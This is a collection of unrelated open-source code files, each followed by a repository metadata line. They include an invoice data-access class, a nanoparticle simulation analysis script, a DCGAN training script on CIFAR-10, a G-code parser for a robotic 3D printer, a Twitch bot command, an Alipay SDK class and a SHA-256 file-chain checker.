'date_sent': 'TEXT',
'date_expiry': 'TEXT',
'max_delay': 'TEXT',
'tax': 'BOOLEAN',
'days': 'INTEGER',
'day_rate': 'FLOAT',
'total': 'TEXT',
'sold': 'BOOLEAN',
'created': 'TEXT',
'id_profile': 'INTEGER NOT NULL'
}
def exist(self, obj):
if isinstance(obj, Invoice):
if hasattr(obj, 'id'):
logging.info('InvoiceDAO use exist with id')
return super().exist(self.where('id', obj.id))
else:
logging.info('InvoiceDAO use exist with name')
return super().exist(self.where('name', obj.name))
else:
logging.info('InvoiceDAO use exist with WHERE')
return super().exist(obj)
def insert(self, obj):
cpy = None
if hasattr(obj, 'total_tax'):
cpy = obj.total_tax
del obj.total_tax
ret = super().insert(obj)
if cpy:
obj.total_tax = cpy
return ret
def update(self, obj):
cpy = None
if hasattr(obj, 'total_tax'):
cpy = obj.total_tax
del obj.total_tax
ret = super().update(obj, self.where('name', obj.name))
if cpy:
obj.total_tax = cpy
return ret
def delete(self, obj):
if isinstance(obj, Invoice):
if hasattr(obj, 'id'):
logging.info('InvoiceDAO use delete with id')
return super().delete(self.where('id', obj.id))
else:
logging.info('InvoiceDAO use delete with name')
return super().delete(self.where('name', obj.name))
else:
logging.info('InvoiceDAO use delete with WHERE')
return super().delete(obj) | LegallGuillaume/MyCompta | website/models/invoice.py | invoice.py | py | 2,980 | python | en | code | 0 | github-code | 13 |
25620512291 | """
To analysing the behavior of ODA at the interface
"""
import typing
import numpy as np
import matplotlib.pylab as plt
import logger
from get_data import GetData
import static_info as stinfo
class WrapData(GetData):
"""
Get data and call other classes to analysis and plot them.
Before that, some calculateion must be done
"""
mean_nanop_com: np.ndarray # Average of the nanoparticle COM over times
# Shift of COM at each time from average
nanoparticle_disp_from_avg_com: np.ndarray
interface_locz: float # Z location of the interface
nanop_radius: float # Radius of the nanoparticle
def __init__(self) -> None:
super().__init__()
self.set_constants()
self._initiate_calc()
def set_constants(self) -> None:
"""
The interface location could also be caluclated dynamicly from
water residues
"""
self.interface_locz = 113.9
self.nanop_radius = stinfo.np_info['radius']
def _initiate_calc(self) -> None:
"""
Initiate calculation and some analysis which are needed for
all other classes
"""
self.mean_nanop_com = self.find_mean_of_np_com()
self.nanoparticle_disp_from_avg_com = self.find_np_shift_from_mean()
def find_mean_of_np_com(self) -> np.ndarray:
"""find mean of the nanoparticle center of mass"""
return np.mean(self.split_arr_dict['APT_COR'], axis=0)
def find_np_shift_from_mean(self,
) -> np.ndarray:
"""find the shift of com of nanoparticle from mean value at
each time step"""
return self.split_arr_dict['APT_COR'] - self.mean_nanop_com
class OdaAnalysis(WrapData):
"""
A class for analyzing ODN data and creating various plots.
This class inherits from the `WrapData` class and provides methods
to analyze ODN data and generate plots related to ODN densities,
center of mass, and more.
Attributes:
None
Methods:
__init__(): Initialize the PlotOdnAnalysis instance.
plot_average_annulus_density(counts: np.ndarray, radii_distance:
np.ndarray) -> None:
Plot the average ODN density across annuluses.
plot_smoothed_annulus_density(counts: np.ndarray, radii_distance:
np.ndarray) -> None:
Plot smoothed ODN density across annuluses.
plot_odn(odn_arr: np.ndarray) -> None:
Plot the center of mass of ODN molecules.
"""
def __init__(self,
log: logger.logging.Logger
) -> None:
super().__init__()
self.amino_arr: np.ndarray = self.split_arr_dict['AMINO_ODN'][:-2]
self.np_arr: np.ndarray = self.split_arr_dict['APT_COR']
self.initiate(log)
def initiate(self,
log: logger.logging.Logger
) -> None:
"""
initiate analysing of ODA behavior
"""
self.prepare_data(log)
# Shift data toward the average COM of the NP
# adjusted_oda: np.ndarray = \
# self.shift_residues_from_np(self.amino_arr,
# self.nanoparticle_disp_from_avg_com)
# radii, molecule_counts, _, g_r = \
# self.distribution_around_avg_np(
# adjusted_oda, self.mean_nanop_com, 1, orginated=True)
def prepare_data(self,
log: logger.logging.Logger
) -> None:
"""
1- Set NP center of mass at origin at each time frame
2- Shift AMINO group accordingly
3- Apply PBC to the AMINO group
"""
amino_c: np.ndarray = self.amino_arr
np_c: np.ndarray = self.np_arr
shifted_amino: np.ndarray = self.com_to_zero(amino_c, np_c)
def com_to_zero(self,
amino: np.ndarray,
np_arr: np.ndarray
) -> np.ndarray:
"""subtract the np com from all the AMINO groups"""
shifted_aminos: np.ndarray = np.empty_like(amino)
for i in range(amino.shape[0]):
for j in range(3):
shifted_aminos[i, j::3] = amino[i, j::3] - np_arr[i, j]
return shifted_aminos
@staticmethod
def distribution_around_avg_np(com_aligned_residues: np.ndarray,
mean_nanop_com: np.ndarray,
delta_r: float,
orginated: bool = False,
max_radius: typing.Union[float, None] = None
) -> tuple:
"""
Calculate the distribution of ODN molecules around the
nanoparticle's average COM.
Parameters:
- com_aligned_residues: Residues where their coordinates are
relative to the nanoparticle's COM for each frame.
- mean_nanop_com: Average COM of the nanoparticle over all frames.
- delta_r: Width of each annulus.
- max_radius: Maximum distance to consider. If None, will be
calculated based on data.
Returns:
- bins: A list of radii corresponding to each annulus.
- counts: A list of counts of ODN molecules in each annulus.
"""
if not orginated:
distances = OdaAnalysis._get_adjusted_distance(
com_aligned_residues, mean_nanop_com)
else:
# Reshaping mean_np_com to broadcast-compatible with adjusted_res
mean_nanop_com_reshaped = \
mean_nanop_com[np.newaxis, :].repeat(
com_aligned_residues.shape[1]//3, axis=0).reshape(1, -1)
# Subtracting mean_np_com from every frame of com_aligned_residues
origin_aligned_residues = \
com_aligned_residues - mean_nanop_com_reshaped
distances = \
OdaAnalysis._get_orginated_distance(origin_aligned_residues)
# Determine max radius if not given
if max_radius is None:
max_radius = np.max(distances)
print(max_radius)
# Create bins based on delta_r
bins = np.arange(0, max_radius + delta_r, delta_r)
# Histogram counts for each frame and then sum over frames
all_counts, _ = np.histogram(distances, bins=bins)
counts = np.sum(all_counts, axis=0)
# Return bin centers (i.e., actual radii) and counts
bin_centers = (bins[:-1] + bins[1:]) / 2
# Calculate the volume of each shell
shell_volumes = 4/3 * np.pi * (bins[1:]**3 - bins[:-1]**3)
# RDF Calculation
# Assuming the number of particles in the system is constant over time
bulk_density = len(distances) / (4/3 * np.pi * max_radius**3)
g_r = counts / (shell_volumes * bulk_density)
return bin_centers, all_counts, counts, g_r
@staticmethod
def _get_adjusted_distance(com_aligned_residues: np.ndarray,
mean_nanop_com: np.ndarray
) -> np.ndarray:
"""
calculate the distance from NP if COM of NP is not at [0,0,0]
"""
# Calculate squared distances from each ODN to the mean_nanop_com
distances_squared = np.sum(
(com_aligned_residues.reshape(
-1,
com_aligned_residues.shape[1]//3, 3) - mean_nanop_com) ** 2,
axis=2)
# Get actual distances
return np.sqrt(distances_squared)
@staticmethod
def _get_orginated_distance(origin_aligned_residues: np.ndarray,
) -> np.ndarray:
"""
calculate the distance if the data is orginated to [0,0,0]
"""
distances_squared = np.sum(origin_aligned_residues.reshape(
-1, origin_aligned_residues.shape[1]//3, 3) ** 2, axis=2)
return np.sqrt(distances_squared)
@staticmethod
def shift_residues_from_np(residues: np.ndarray,
np_displacement: np.ndarray
) -> np.ndarray:
"""
shift coordinates of the residues relative to the displament of
the shift of NP from averg NP com at each frame
"""
# Determine the number of residues
num_residues: int = residues.shape[1] // 3
# Reshape the displacement data
displacement_reshaped: np.ndarray = np_displacement[:, np.newaxis, :]
# Tile the reshaped data to match the residues shape and reshape
displacement_tiled: np.ndarray = \
np.tile(displacement_reshaped,
(1, num_residues, 1)).reshape(residues.shape)
# Subtract
return residues - displacement_tiled
if __name__ == "__main__":
OdaAnalysis(log=logger.setup_logger('oda_analysis.log'))
| saeed-amiri/analysing-legacy | codes/oda_analysing.py | oda_analysing.py | py | 8,871 | python | en | code | 0 | github-code | 13 |
27876443135 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from src import meta
from fnmatch import fnmatch
import argparse
import os
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--label', default='toxic')
parser.add_argument('--method', default='spearman')
parser.add_argument('--exclude', action='append')
args = parser.parse_args()
exclusions = ['test_*', ]
if args.exclude is not None:
exclusions += args.exclude
df = None
for model_name in os.listdir('cache'):
if model_name == 'features':
continue
if any(fnmatch(model_name, ex) for ex in exclusions):
continue
try:
model_preds = pd.concat(meta.get_model_prediction(model_name, fi, 'val') for fi in range(meta.cv.n_splits))
if df is None:
df = pd.DataFrame(index=model_preds.index)
df[model_name] = model_preds[args.label]
except:
print("Error loading predictions for %r..." % model_name)
print("Computing correlations for %r..." % list(df.columns))
corr = df.corr(method=args.method)
sns.clustermap(data=corr, metric='correlation')
plt.show()
if __name__ == "__main__":
main()
| alno/kaggle-jigsaw-toxic-comment-classification-challenge | src/tools/corrplot.py | corrplot.py | py | 1,290 | python | en | code | 4 | github-code | 13 |
2845727012 | nodes_str = '''
1
/ \\
2 3
/ \\
4 5
/ \\
6 7
'''
print(nodes_str)
nodes = { "data" : 1 }
nodes['left'] = { "data" : 2 }
nodes['right'] = { "data" : 3 }
nodes['left']['left'] = { "data" : 4 }
nodes['left']['right'] = { "data" : 5 }
nodes['left']['left']['left'] = { "data" : 6 }
nodes['left']['right']['right'] = { "data" : 7 }
print(nodes)
q = []
n = []
q.insert(0,nodes)
def traverse():
l = len(q)
while l > 0:
i = q.pop()
print(i['data'])
n.append(i['data'])
if 'left' in i:
q.insert(0,i['left'])
if 'right' in i:
q.insert(0,i['right'])
l = len(q)
#break
return
traverse()
print(n) | melezhik/sparrow-plugins | ds-binary-tree-bft2/tasks/python/task.py | task.py | py | 711 | python | tr | code | 2 | github-code | 13 |
23833077333 | #----------------------------------------------------------
# FUNCION PrintTabLatex()
#
# PARAMETROS
# aTitulos: Lista con los títulos a imprimir
# aDatos: Lista de listas con los datos correspondientes
# a cada titulo
# USO Imprime una tabla en formato latex para facilidad
# del pasaje de datos al informe
#-----------------------------------------------------------
def PrintTabLatex(aTitulos,aDatos):
cCPypeC = "|"
aTab = []
cLin = ""
cTit = ""
cIni = "\hline "
cFin = " \\\\"
for nj in range(len(aTitulos)):
if nj < len(aTitulos)-1:
cTit = cTit + aTitulos[nj]+ " & "
if nj == len(aTitulos)-1:
cTit = cTit + aTitulos[nj]
cTit = cIni + cTit + cFin
for ni in range(len(aDatos)):
cCPypeC=cCPypeC+"c|"
cLin = ""
for nj in range(len(aDatos[ni])):
if nj < len(aDatos[ni])-1:
cLin = cLin + aDatos[ni][nj]+ " & "
if nj == len(aDatos[ni])-1:
cLin = cLin + aDatos[ni][nj]
cLin = cIni + cLin + cFin
aTab.append(cLin)
print("\\begin{table}[H]")
print(" \makegapedcells")
print(" \centering")
print("\\resizebox{0.7\\textwidth}{!}{")
print(" \\begin{tabular}{"+cCPypeC+"}")
print(cTit)
for ni in range(len(aTab)):
print(aTab[ni])
print(" \hline")
print(" \end{tabular}}")
print("\end{table}")
return
| fmonpelat/Analisis-Numerico---TP2 | python scripts/PrintTabLatex.py | PrintTabLatex.py | py | 1,280 | python | pt | code | 0 | github-code | 13 |
22720200123 | """Commands: "!total [emote]", "!minute [emote]"."""
from bot.commands.abstract.command import Command
from bot.utilities.permission import Permission
from bot.utilities.tools import replace_vars
class OutputStats(Command):
"""Reply total emote stats or stats/per minute."""
perm = Permission.User
def __init__(self, _):
"""Initialize variables."""
self.responses = {}
def match(self, bot, user, msg, tag_info):
"""Match if msg = !total <emote> or !minute <emote>."""
cmd = msg.strip().lower()
if cmd.startswith("!total ") or cmd.startswith("!minute "):
cmd = msg.strip() # now without .lower()
cmd = cmd.split(" ", 1)
return cmd[1].strip() in bot.emotes.get_emotes()
elif cmd == "!kpm":
return True
elif cmd == "!tkp":
return True
def run(self, bot, user, msg, tag_info):
"""Write out total or minute stats of an emote."""
self.responses = bot.config.responses["outputStats"]
cmd = msg.strip().lower()
if cmd.startswith("!total "):
emote = self._second_word(msg)
count = bot.ecount.get_total_count(emote)
response = self.responses["total_reply"]["msg"]
elif cmd.startswith("!minute "):
emote = self._second_word(msg)
count = bot.ecount.get_minute_count(emote)
response = self.responses["minute_reply"]["msg"]
elif cmd == "!tkp":
emote = "Kappa"
count = bot.ecount.get_total_count(emote)
response = self.responses["total_reply"]["msg"]
elif cmd == "!kpm":
emote = "Kappa"
count = bot.ecount.get_minute_count(emote)
response = self.responses["minute_reply"]["msg"]
else:
return
var = {"<EMOTE>": emote, "<AMOUNT>": count}
bot.write(replace_vars(response, var))
@staticmethod
def _second_word(msg):
"""Returns second word (after !command usually)."""
cmd = msg.strip().split(" ", 1)
return cmd[1]
| NMisko/monkalot | bot/commands/outputstats.py | outputstats.py | py | 2,111 | python | en | code | 17 | github-code | 13 |
42488286511 | import numpy as np
import matplotlib.pyplot as plt
import NIST_mass_attenuation_data as NIST
import importlib
importlib.reload(NIST)
#class MassAttenData:
COL_MU = 1
COL_MUEN = 2
def log_spaced_array(start, end, points):
arr = pow(np.logspace(np.log10(start), np.log10(end), points), 10.0)
return arr
def log_interp(x, xp, yp):
logx = np.log10(x)
logxp = np.log10(xp)
logyp = np.log10(yp)
return np.power(10.0, np.interp(logx, logxp, logyp))
def get_list_of_elements():
Z_list = list(zip(NIST.data["z"].values(), NIST.data["z"]))
Z_list_str = "List of elements included in data: \n"
Z_list_str += "----------------------------------\n"
for i in range(1,len(Z_list), 2):
Z_list_str += str(Z_list[i][0]) + ": " + Z_list[i][1].capitalize() + " (" + Z_list[i-1][1] + ")\n"
print(Z_list_str)
def get_Z_idx(Z):
if type(Z) is str:
try:
Z_idx = NIST.data["z"][Z.lower()]
except:
raise ValueError("Element " + Z + " not found in database.")
elif type(Z) is int:
Z_idx = Z
else:
raise TypeError("Only ints and strings allowed for element selection.")
return Z_idx
def interp_data(E, Z, col):
Z_idx = get_Z_idx(Z)
mu_data = NIST.data[Z_idx]["data"]
E_data = mu_data[:,0]
y_data = mu_data[:,col]
return log_interp(E, E_data, y_data)
def get_mu_rho(E, Z):
return interp_data(E,Z,COL_MU)
def get_muen_rho(E, Z):
return interp_data(E,Z,COL_MUEN)
def get_mu(E, Z):
rho = NIST.data[get_Z_idx(Z)]["density"]
return interp_data(E,Z,COL_MU) * rho
def get_muen(E, Z):
rho = NIST.data[get_Z_idx(Z)]["density"]
return interp_data(E,Z,COL_MUEN) * rho
def plot_spectrum(Z_list, same_plot=False):
if type(Z_list) is not list:
Z_list = [Z_list]
for Z in Z_list:
Z_idx = get_Z_idx(Z)
data = NIST.data[Z_idx]["data"]
E = data[:,0]
mu = data[:,1]
muen = data[:,2]
plt.figure()
plt.plot(E, mu, '-')
plt.plot(E, muen, '--')
plt.title(NIST.data[Z_idx]["name"])
plt.xlabel("E (MeV)")
plt.ylabel(r'$\mu/\rho \ or \ \mu_{en}/\rho \ (cm^2g^{-1})$')
plt.legend([r'$\mu/\rho$', r'$\mu_{en}/\rho$'])
plt.yscale('log')
plt.xscale('log')
plt.show()
| agreenswardellipse/FAFA05_gamma_spectroscopy | NIST_mass_attenuation.py | NIST_mass_attenuation.py | py | 2,119 | python | en | code | 2 | github-code | 13 |
17052789854 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class IndirectQualificationInfo(object):
def __init__(self):
self._image_list = None
self._mcc_code = None
@property
def image_list(self):
return self._image_list
@image_list.setter
def image_list(self, value):
if isinstance(value, list):
self._image_list = list()
for i in value:
self._image_list.append(i)
@property
def mcc_code(self):
return self._mcc_code
@mcc_code.setter
def mcc_code(self, value):
self._mcc_code = value
def to_alipay_dict(self):
params = dict()
if self.image_list:
if isinstance(self.image_list, list):
for i in range(0, len(self.image_list)):
element = self.image_list[i]
if hasattr(element, 'to_alipay_dict'):
self.image_list[i] = element.to_alipay_dict()
if hasattr(self.image_list, 'to_alipay_dict'):
params['image_list'] = self.image_list.to_alipay_dict()
else:
params['image_list'] = self.image_list
if self.mcc_code:
if hasattr(self.mcc_code, 'to_alipay_dict'):
params['mcc_code'] = self.mcc_code.to_alipay_dict()
else:
params['mcc_code'] = self.mcc_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = IndirectQualificationInfo()
if 'image_list' in d:
o.image_list = d['image_list']
if 'mcc_code' in d:
o.mcc_code = d['mcc_code']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/IndirectQualificationInfo.py | IndirectQualificationInfo.py | py | 1,773 | python | en | code | 241 | github-code | 13 |
17945288810 | import ipywidgets as widgets
import json
from IPython.display import display
from .sampling import Sampling
from .filters import Filters
from .columns import Columns
class Downloader:
def __init__(
self,
name=None,
catalog_item=None,
display_value=False,
display_widget=False,
):
self.catalog_item = catalog_item
self.columns = Columns(
spec=self.catalog_item['spec'],
display_widget=False
)
self.filters = Filters(
spec=self.catalog_item['spec'],
display_widget=False
)
self.sample_ratio = Sampling(display_widget=False)
self.value = widgets.ValueWidget()
# self.download_button = widgets.Button(
# description="Download",
# icon='plus'
# )
# self.generator = widgets.interactive_output(generate_cell, {})
# def on_button_clicked(b):
# with self.generator:
# get_ipython().set_next_input(f'spec = 1')#{self.spec}')
# pass
# self.download_button.on_click(on_button_clicked)
self.widgets = [
self.columns.widget_container,
self.filters.widget_container,
self.sample_ratio.widget_container,
# self.download_button,
# self.generator,
]
def update_output(*args):
self.value.value = self.spec
update_output()
self.columns.value.observe(update_output, 'value')
self.filters.value.observe(update_output, 'value')
self.sample_ratio.value.observe(update_output, 'value')
if display_value:
def display_value(spec):
download_spec = json.dumps(
{
'id': catalog_item['id'],
'executor_type': catalog_item['executor_type'],
'spec': spec
},
indent=4
)
print(
'to get date copy to next cell:\n\n'
f"""df = lakey.download({download_spec})"""
)
self.output = widgets.interactive_output(
display_value,
{'spec': self.value}
)
self.widgets.append(self.output)
self.widget_container = widgets.VBox(
self.widgets
)
if display_widget:
display(self.widget_container)
@property
def spec(self):
return {
'columns': self.columns.selected_columns,
'filters': self.filters.filters,
'randomize_ratio': self.sample_ratio.sampling_ratio
}
| cosphere-org/lakey-ui | lakey_ui/lakey/widgets/downloader.py | downloader.py | py | 2,740 | python | en | code | 1 | github-code | 13 |
71595944339 | import re #standard library providing regular expression facilities
import math #standard library providing mathematical operations
def move(joint, client):
'''converts the output (joint angles) as commands to the robot controller'''
string = '{A1 ' + str(list(joint)[0][0]) + ', A2 ' + str(list(joint)[0][1]) + ', A3 '\
+ str(list(joint)[0][2]) + ', A4 ' + str(list(joint)[0][3]) + ', A5 '\
+ str(list(joint)[0][4]) + ', A6 ' + str(list(joint)[0][5]) + '}'
client.write('MYAXIS', string)
def extruder_online(client, arg):
'''Converts parser's instruction to start/stop extruding to robot controller as ON/OFF on I/O
and prints the change of extruding state'''
if arg == 'START':
client.write('$OUT[16]', 'True')
elif arg == 'STOP':
client.write('$OUT[16]', 'False')
else:
print('The input of extruder() has to be either START or STOP')
def extruder_offline(robot, arg):
'''Same as extruder(), just for offline usage '''
if arg == 'START':
robot.setDO('$OUT[16]', 'True')
elif arg == 'STOP':
robot.setDO('$OUT[16]', 'False')
else:
print('The input of extruder() has to be either START or STOP')
def parser(filename):
'''parse gcode commands to be used in our code'''
parsed_file = list() # create a list
layer = 0 # z-axis, or current height of the print
with open(filename) as gcode: # open gcode path and use as variable
for line in gcode: # for each line in gcode:
line = line.strip() # delete all unnecessary ASCII characters
if re.findall("LAYER:", line): # if new layer found, update z-axes
layer += 1
continue # similar to elif
if re.findall("G1", line): # check if line begins with "G1"
coord = re.findall(r'[XY].?\d+.\d+', line) # assign coord values
if len(coord) == 2: # if both coords were assigned
X = re.findall('\d*\.?\d+', coord[0])[0] # assign X-value
Y = re.findall('\d*\.?\d+', coord[1])[0] # assign Y-value
parsed_file.append([float(X), float(Y), layer, True]) # append our desired output for use in the project:
return parsed_file # return parsed list
def interpolate(path, detail):
'''Interpolates end-effector's path for smooth and linear velocity.
Not used, hence not commented.'''
extra = 0 # inserted value, colide with indexing
for i in range(len(path)-1): # go through all points
number_of_cuts = int(distance(path[i+extra], path[i+extra+1])//detail) #calculates how many times we fit distance 1.45
if number_of_cuts > 0: # interpolate the 2 points only if the distance is > 1.45
dist_x, dist_y = distance_x_y(
path[i+extra], path[i+extra+1], number_of_cuts+1) # return the distance to be added to each coordinate
for k in range(number_of_cuts): # for each index k depending on value of number_of_cuts
item = list() # each iteration create a new list and discard the last
item.append((k+1)*dist_x + path[i+extra][0]) # append new interpolated x coordinate to the path
item.append((k+1)*dist_y + path[i+extra][1]) # append new interpolated y coordinate to the path
item.append(path[i+extra][2]) # append which lazer it is
item.append(path[i+extra][3]) # append the true or false value whether we are extruding
path.insert(i+k+extra+1, item) # insert the created list above to the path on the correct index
extra += number_of_cuts # store how many items were added for correct indexing
def distance(point1, point2):
'''computes distance between points for use in interpolate()'''
# index 0 is X, index 1 is Y
distance = math.sqrt((point1[0]-point2[0])**2 + (point1[1]-point2[1])**2) # calculates the eular distance between 2 points
return distance
def distance_x_y(point1, point2, number_of_cuts):
'''return the distance which is added to each points so that the points are equally distanced'''
distance_x = (point2[0] - point1[0])/(number_of_cuts) # calculate the distance for x coord depending on number_of_cuts
distance_y = (point2[1] - point1[1])/(number_of_cuts) # calculate the distance for y coord depending on number_of_cuts
return distance_x, distance_y
| malek-luky/Industrial-Robotics | 3D Printing/62607_FinalReport_Team4/functions.py | functions.py | py | 5,429 | python | en | code | 0 | github-code | 13 |
32025138671 | '''Deep Convolutional Generative Adverserail Netowrks'''
# Import libraries
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optimizer
import torch.utils.data
from torch.autograd import Variable
import torchvision.datasets as datasets
import torchvision.utils as tvutils
import torchvision.transforms as tvtransforms
import os
# Make sure Pytorch uses GPU
device = torch.device('cuda')
dtype = torch.cuda.FloatTensor
# Hyperparameters
BATCH_SIZE = 64
IMAGE_SIZE = 64 # set the size of each generated image to (64, 64)
N_EPOCHS = 10
# Transformations
transforms = tvtransforms.Compose([
tvtransforms.Scale(IMAGE_SIZE),
tvtransforms.ToTensor(),
tvtransforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
# Load dataset
# a. Download dataset to the './data' folder
# b. Apply the transformations specified above
print('[INFO] Loading dataset')
dataset = datasets.CIFAR10(root='data', download=True, transform=transforms)
# c. Load the dataset from './data' bacth by batch
data_loader = torch.utils.data.DataLoader(dataset, batch_size=BATCH_SIZE,
shuffle=True)
# Initialize weights
def init_weights(neural_net):
'''
Initialize the neural network weights using uniform initialization
Arguments:
* neural_net: the neural netowrk to initialize the weights of
'''
# Get the name of the layer
class_name = neural_net.__class__.__name__
# For every layer in the netowrk
if class_name.find('Conv') != -1:
# Initialize the Conv layers uniformally
neural_net.weight.data.normal_(0.0, 0.02) # ...normal_(mean, std)
elif class_name.find('BatchNorm') != -1:
# Initialize the BatchNorm layers uniforamlly
neural_net.weight.data.normal_(1.0, 0.02)
# Fill the biases with 0
neural_net.bias.data.fill_(0)
# Creating the Genrator class
class Generator(nn.Module):
'''Generator, ay?'''
def __init__(self):
'''Genertaor architecture'''
super(Generator, self).__init__()
self.gen_model = nn.Sequential(
nn.ConvTranspose2d(100, 512, 4, 1, 0, bias=False), # 100 => size of input vector noise
nn.BatchNorm2d(512),
nn.ReLU(True),
nn.ConvTranspose2d(512, 256, 4, 2, 1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(True),
nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
nn.ConvTranspose2d(128, 64, 4, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.ConvTranspose2d(64, 3, 4, 2, 1, bias=False), # out_channels = 3 (RGB)
nn.Tanh()
)
self.gen_model.cuda()
def forward(self, input_noise):
'''
Forward propagates the signal inside of the Gnerator
Argumets:
* input_noise: noise random vector of size 100
Returns:
* output: output of the generator; a fake image
'''
output = self.gen_model(input_noise)
return output
# Creating the Gen
print('[INFO] Creating Generator')
generator = Generator()
generator.apply(init_weights) # Initializing Gen weights
# Creating the Discriminator class
class Discriminator(nn.Module):
'''Discriminator. What you gonna do, motherfucker?'''
def __init__(self):
'''Defining the discriminator architecture'''
# Initializing the Module class
super(Discriminator, self).__init__()
self.disc_model = nn.Sequential(
nn.Conv2d(3, 64, 4, 2, 1, bias=False),
nn.LeakyReLU(0.02, True),
nn.Conv2d(64, 128, 4, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, True),
nn.Conv2d(128, 256, 4, 2, 1, bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, True),
nn.Conv2d(256, 512, 4, 2, 1, bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, True),
nn.Conv2d(512, 1, 4, 1, 0, bias=False), # output = 1 channel (vector of 0 or 1)
nn.Sigmoid()
)
self.disc_model.cuda()
def forward(self, input_image):
'''
Forward propagates the signal inside of the Generator
Argumets:
* input_image: image generated by the Generator
Returns:
* output: output of the discrminator; a vector of (0, 1)
corresponding to whether the image generated by the Gen
is close to the real one or not
'''
output = self.disc_model(input_image)
return output.view(-1) # flatten the putput of the convolution
# Creating the Discriminator and itializing its weights
print('[INFO] Creating Discriminator')
discriminator = Discriminator()
discriminator.apply(init_weights)
# Training DCGAN
# a. Training the Discriminator with a real image
# b. Training the Disciriminator with a fake image
# Loss function
criterion = nn.BCELoss()
# Genertaor optimizer
gen_opt = optimizer.Adam(generator.parameters(), lr=0.0002, betas=(0.5, 0.999))
# Discriminator optimizer
disc_opt = optimizer.Adam(discriminator.parameters(), lr=0.0002, betas=(0.5, 0.999))
# Creating necessary directory
dirs = ['results', 'results/real', 'results/fake']
for directory in dirs:
if not os.path.exists(directory):
os.mkdir(directory)
# Big fucking training loop
print('[INFO] Started training...')
for epoch in range(N_EPOCHS+1):
# Loop over the data mini-batches generated by the data_loader
for i, data_batch in enumerate(data_loader, 0):
# a. Training the Discriminator
# a.0. Clear out the graients(?)
discriminator.zero_grad()
# a.1. Train the Discriminator with real images
# Get a batch of real images
real_images, _ = data_batch # _ => is the target of each image, which we don't care about
input_batch = Variable(real_images).type(dtype)
# Define the target
# Member that 1 corresponds to real images and 0 correspons to fake ones
target_real = Variable(torch.ones(input_batch.size()[0])).type(dtype) # this is the batch size... yup...
# print(f'input_batch.size()[0]: {input_batch.size()[0]}') # Guess what? It's 64... Jesus fucking Christ
# Feed the batch to the Disc
y_train_pred_real = discriminator(input_batch)
# Calcuate the error
error_disc_real = criterion(y_train_pred_real, target_real)
# a.2. Train the Discriminator with fake images
# Generate fake images
# Generate a noise vector of size 100
# More like 100 feature maps each of size 1x1
noise_vector = Variable(torch.randn(input_batch.size()[0], 100, 1, 1)).type(dtype)
# Use the Gen to generate a batch of fake images from the noise_vectors
fake_images = generator(noise_vector)
# Target
target_fake = Variable(torch.zeros(input_batch.size()[0])).type(dtype)
# Train the Disc on fake images
y_train_pred_fake = discriminator(fake_images.detach())
# Calculate the error
error_disc_fake = criterion(y_train_pred_fake, target_fake)
# a.3. Back-prop the total error
# Calculate the total error
error_disc_total = error_disc_fake + error_disc_real
# Back-prop the total error
error_disc_total.backward()
# Use Adam to update the weights
disc_opt.step()
# b. Training the Generator
# Zero out the gradients
generator.zero_grad()
# Forward propagate the fake generated images into the Dscriminator to get the prediction
y_train_gen = discriminator(fake_images)
# Target if the target_real; the Gen wants the Disc to think that
# the images generated by it are real
error_gen = criterion(y_train_gen, target_real)
# Back-prop the error to the GNN
error_gen.backward()
gen_opt.step()
# Printing shit
print(f'Epoch [{epoch}/{N_EPOCHS}] Step [{i}/{len(data_loader)}]', end=' ')
print(f'LossDR: {error_disc_real.item():.3f}', end=' ')
print(f'LossDF: {error_disc_fake.item():.3f}', end=' ')
print(f'LossDT: {error_disc_total.item():.3f}', end=' ')
print(f'LossG: {error_gen.item():.3f}')
# Save real and fake images every 100 steps
if i % 100 == 0:
print('[INFO] Saving images in ./results')
tvutils.save_image(real_images,
f'./results/real/real_samples_epoch_{epoch:03d}_batch_{i:03d}.png',
normalize=True)
fake_images_2 = generator(noise_vector)
tvutils.save_image(fake_images_2.data,
f'./results/fake/fake_samples_epoch_{epoch:03d}_batch_{i:03d}.png',
normalize=True)
print('DONE!')
| PavlySz/CIFAR10-GANs | dcgan.py | dcgan.py | py | 9,043 | python | en | code | 0 | github-code | 13 |
27684078643 | import hashlib
import secrets
import re
def calculate_sha256(filename):
sha256_hash = hashlib.sha256()
with open(filename, "rb") as f:
for byte_block in iter(lambda: f.read(4096), b""):
sha256_hash.update(byte_block)
return sha256_hash.hexdigest()
def comprobar_fila_condiciones(fila):
patron = re.compile(b'[0-9a-f]{8}(\t|\s+)[0-9a-f]{2}(\t|\s+)100')
return bool(patron.match(fila))
def main(file1, file2):
# Leer el contenido del primer archivo
with open(file1, 'rb') as f1:
content_file1 = f1.read()
# Leer el contenido del segundo archivo
with open(file2, 'rb') as f2:
content_file2 = f2.read()
line_count = sum(1 for line in f2)
numero_0s=0
# Verificar si el segundo archivo comienza con el contenido del primero
if content_file2.startswith(content_file1):
# Calcular el resumen SHA-256 del segundo archivo
sha256_hex = calculate_sha256(file2)
# Verificar si comienza con una secuencia de 0's
if sha256_hex.startswith("00"):
numero_0s = len(sha256_hex)-len(sha256_hex.lstrip('0'))
lines1 = content_file1.splitlines()
last_line1 = lines1[line_count-1] # Última línea del segundo archivo
# Verificar si el segundo archivo cumple con las características específicas
lines2 = content_file2.splitlines()
last_line2 = lines2[line_count-1] # Última línea del segundo archivo
penultima_linea2 = lines2[line_count-2] # Penúltima línea del segundo archivo
if comprobar_fila_condiciones(last_line2) and penultima_linea2==last_line1:
return True, sha256_hex, numero_0s
return False, None, numero_0s | mikel0912/SGSSI-23-Labo06 | comprobacion/Labo06Act0.py | Labo06Act0.py | py | 1,799 | python | es | code | 0 | github-code | 13 |
6752607604 | from django.db import models
from custom_users.models import User
class Car(models.Model):
